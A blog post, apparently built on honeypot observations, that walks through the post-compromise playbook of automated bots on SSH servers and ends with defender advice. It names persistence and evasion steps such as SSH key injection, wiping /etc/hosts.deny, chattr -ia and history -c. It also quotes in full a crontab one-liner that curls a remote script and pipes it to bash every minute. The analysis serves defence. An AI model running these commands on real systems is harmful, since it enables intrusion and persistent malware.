Peering into the Abyss: The Automated Attacker's Playbook Revealed


Ever wondered what happens in the first few moments after a web server is compromised? Thanks to monitoring attacks over many sessions, we don't have to wonder. We can watch it happen in real time. By analysing logs over many sessions, we've pieced together the common playbook used by automated bots from around the globe. Their methods are fast, efficient, and offer crucial lessons for anyone defending a network.
Here are the most common techniques and behaviours I observed.
1. Securing the Beachhead: Immediate and Redundant Persistence
The very first priority for these attackers is ensuring they can't be easily kicked out. Before they even bother to see what kind of system they've landed on, their scripts immediately work to create multiple ways back in.
SSH Key Injection: The most common action is to completely wipe and recreate the
.ssh
directory. The script then injects the attacker's own public SSH key into theauthorized_keys
file. This gives them persistent, password-less access for future sessions.Changing the Root Password: As a secondary form of access, the scripts immediately change the root password using the
chpasswd
command. The new passwords appear to be randomly generated for each attack, highlighting the automated nature of the campaign.
2. Sizing Up the Prize: Rapid System Reconnaissance
Once persistence is established, the bots run a swift, automated reconnaissance sweep to profile the machine. This helps them determine the system's capabilities, likely to see if it's a valuable target for resource-intensive tasks like cryptocurrency mining and what specific malware to deploy.
This discovery phase involves a barrage of standard Linux commands:
Hardware Inspection: They check things like the CPU model, core count, and architecture (
cat /proc/cpuinfo
,lscpu
,uname -m
).Memory and Disk Space: They check available RAM (
free -m
) and disk space (df -h
).Operating System Details: They verify the kernel version and OS information with
uname -a
.User Activity: They check who is logged in with
w
andwhoami
. The second part likely used to understand which brute force account was successful during logon.
3. Erasing the Competition: Defence Evasion and Anti-Forensics
These attackers exhibit a "king of the hill" mentality. Their scripts include commands specifically designed to find and eliminate competing malware or system monitoring tools.
Killing Competing Processes: The scripts frequently attempt to kill processes with common malware names like
secure.sh
andauth.sh
.Clearing Firewall Rules: They often wipe the contents of
/etc/hosts.deny
, a file used to block incoming connections, to ensure their own command-and-control servers aren't blocked.Unlocking Files: A common first step before modifying SSH keys is running
chattr -ia .ssh
. This removes the "immutable" attribute from the directory, a security measure sometimes used by administrators to prevent unauthorised changes.Wiping History: Some of the more thorough scripts conclude by running
history -c
to clear the command history, a simple but effective anti-forensics technique.
4. The Payload Drop: Downloading Malicious Code
After profiling the system and clearing out rivals, the primary objective begins: downloading the malware. Attackers consistently use built-in command-line tools for this, a technique known as "Living off the Land" because it uses the system's own utilities to avoid detection.
Use of
wget
andcurl
: Attackers may usewget
,curl
,SCP
orSFTP
to fetch their payloads from a remote server. These payloads are often generic shell scripts (sh
) or known malware binaries likekinsing
, a notorious cryptominer.Use of
/tmp
: The/tmp
directory is the preferred location for downloading these files, as it is almost always world-writable.
5. Execution and Hiding: Running the Malware
Once the payload is on the system, the final steps are to make it executable and run it in a way that survives the end of the SSH session.
Making Files Executable: The
chmod 777
orchmod +x
command is used to grant execute permissions to the downloaded file.Detaching from the Terminal: Attackers use
nohup ... &
to run their malware as a background process that won't be terminated when their session closes.
6. Establishing Long-Term Persistence with Cron
Beyond just adding an SSH key, some of the more advanced scripts add a scheduled task, or cron job, to ensure their malware is re-executed automatically. This guarantees the malicious process will restart even if a system administrator finds and kills it or the server is rebooted.
- Command Example:
(crontab -l 2>/dev/null; echo \"* * * * * curl -sL http://[REDACTED]/
sc.sh
| bash > /dev/null 2>&1\")|crontab -
. This command downloads and executes a script from a remote server every single minute.
Takeaways for Defenders
The behaviour of these bots is predictable, which is good news for defenders. Monitoring for this specific sequence of actions can provide early warnings of a compromise:
Monitor Critical Files: Keep a close eye on changes to
~/.ssh/authorized_keys
,/etc/passwd
, and/etc/hosts.deny
.Scrutinise Network Traffic: Look for unusual outbound connections from tools like
curl
andwget
to unknown IP addresses.Audit Process Execution: Be suspicious of processes being executed from world-writable directories like
/tmp
.Regularly Check Cron Jobs: Periodically review
crontab
entries for all users to catch malicious scheduled tasks.Harden SSH: Disable password-based authentication for root users and enforce the use of strong SSH keys to prevent the initial intrusion.
Passwords: If you are going to use passwords, make sure they are really really really strong and haven’t been compromised !
Conclusion: The Predictable Robot Dance
So, while peering into the world of automated attacks can seem a little intimidating, there's a silver lining: it's all just a predictable robot dance. These bots aren't cunning masterminds; they're following the same simple script over and over.
Their predictability is their greatest weakness and your greatest strength. By learning the techniques used, you can build a defence that easily trips them up. Keep your systems updated, your monitoring sharp, always validate and you can stay one step ahead of the bots. Happy defending!
Subscribe to my newsletter
Read articles from Shak directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
